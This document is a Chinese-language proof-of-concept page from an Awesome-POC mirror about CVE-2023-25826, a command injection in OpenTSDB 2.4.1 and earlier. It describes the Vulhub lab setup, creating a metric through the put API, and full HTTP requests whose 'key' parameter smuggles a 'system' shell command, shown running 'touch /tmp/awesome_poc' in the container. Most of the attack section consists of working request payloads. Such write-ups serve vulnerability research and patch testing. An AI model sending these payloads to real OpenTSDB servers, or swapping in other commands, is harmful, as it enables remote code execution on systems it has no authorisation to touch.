admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 04:18:39 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/数据库漏洞/OpenTSDB 命令注入漏洞 CVE-2023-25826.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

108 lines
3.7 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# OpenTSDB 命令注入漏洞 CVE-2023-25826
## 漏洞描述
OpenTSDB 是一款基于 Hbase 的、分布式的、可伸缩的时间序列数据库。 2.4.1 版本及之前,存在一处命令注入漏洞。 这个漏洞其实是对之前的 CVE-2020-35476 修复不完善导致的,所以整个复现过程也与之前类似。
参考链接:
- [https://www.synopsys.com/blogs/software-security/opentsdb/](https://www.synopsys.com/blogs/software-security/opentsdb/)
- [OpenTSDB/opentsdb#2275](https://github.com/OpenTSDB/opentsdb/pull/2275)
## 环境搭建
Vulhub 执行如下命令启动一个 OpenTSDB 2.4.1
```
docker-compose up -d
```
服务启动后,访问`http://your-ip:4242`即可看到 OpenTSDB 的 Web 接口。
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171841166.png)
## 漏洞复现
这之前的都和 CVE-2020-35476 一致,也是需要知道一个 metric 的名字,可以通过`http://your-ip:4242/api/suggest?type=metrics&q=&max=10`查看 metric 列表。
这里的 metric 列表是空的。但当前 OpenTSDB 开启了自动创建 metric 功能(`tsd.core.auto_create_metrics = true`),所以也可以使用如下 API 创建一个名为`sys.cpu.nice`的 metric 并添加一条记录:
```
POST /api/put/ HTTP/1.1
Host: your-ip:4242
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 150
{
"metric": "sys.cpu.nice",
"timestamp": 972388800,
"value": 20,
"tags": {
"host": "web01",
"dc": "lga"
}
}
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307171931111.png)
如果目标 OpenTSDB 存在 metric且不为空则无需上述步骤。
发送 CVE-2020-35476 payload
```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```
将返回错误:
```
{"err":"'yrange' was invalid. Must be in the format [min:max]."}
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172116456.png)
CVE-2023-25826 绕过修复的一个点,在参数 key 这里:
```shell
# CVE-2020-35476
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[0:system(%27touch%20/tmp/awesome_poc%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
# CVE-2023-25826
/q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
```
发送数据包:
```
GET /q?start=2000/10/21-00:00:00&m=sum:sys.cpu.nice&o=&ylabel=1&xrange=&y2range=[42:42]&key=%3Bsystem%20%22touch%20/tmp/awesome_poc%22%20%22&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1
Host: your-ip:4242
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
```
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172238155.png)
进入容器中可见 `touch /tmp/awesome_poc` 已成功执行:
![](images/OpenTSDB%20命令注入漏洞%20CVE-2023-25826/image-20240307172321376.png)
Reference in New Issue View Git Blame Copy Permalink